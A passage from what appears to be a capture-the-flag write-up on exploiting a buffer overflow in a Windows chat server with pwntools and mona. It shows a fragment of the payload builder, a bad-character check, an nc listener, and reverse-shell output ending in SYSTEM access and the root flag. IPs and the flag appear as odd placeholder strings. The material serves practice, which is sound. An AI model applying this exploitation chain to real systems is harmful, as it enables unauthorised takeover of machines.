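        print("0x%08x -> %r" % (addr, p32(addr)))
    payload = build_payload(4560, 0x62501533, b"\xcc" * 10)
    print(len(payload), payload[4560:4564])
```

Running check_badchars over the whole buffer rather than just the shellcode is the point: the return address and the NOP sled are part of what the server copies, and an address such as 0x62500a00 would be cut short by the same NUL handling that the byte-array test found.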
Listening on my machine with nc:
nc -lvp 4433
listening on [any] 4433 ...
10.10π: inverse host lookup failed: Unknown host
connect to [10.10π] from (UNKNOWN) [10.10π] 49299
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\admin\Desktop\vulnerable-apps\chatserver>
It worked!
So now my custom script can be fired against the real machine.
Just change the IP to the real one. It worked flawlessly on the first try.
nc -lvp 4433
listening on [any] 4433 ...
10.10π: inverse host lookup failed: Unknown host
connect to [10.10π] from (UNKNOWN) [10.10π] 49467
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
The service was running as NT AUTHORITY\SYSTEM, so the machine is fully compromised and no privilege escalation is needed.
Finally, the root flag is at the following path:
C:\Users\drake\Desktop>type root.txt
type root.txt
5b10π
I enjoyed the machine because everything went as expected without issues; the only bad char being \x00 was refreshing because I expected a lot of debugging in the bad-char process. Not bad at all. The machine description suggests that you have to reverse engineer the .exe file, so you can probably use another approach like Ghidra, radare2 or another reversing tool, but my goal was to practice buffer overflow attacks with mona and exploit development with Python and pwntools.
I was happy at the end; it was also more fun than exploiting the same .exe file with different badchars/offsets like in the previous posts. Good stuff.
Thanks for reading!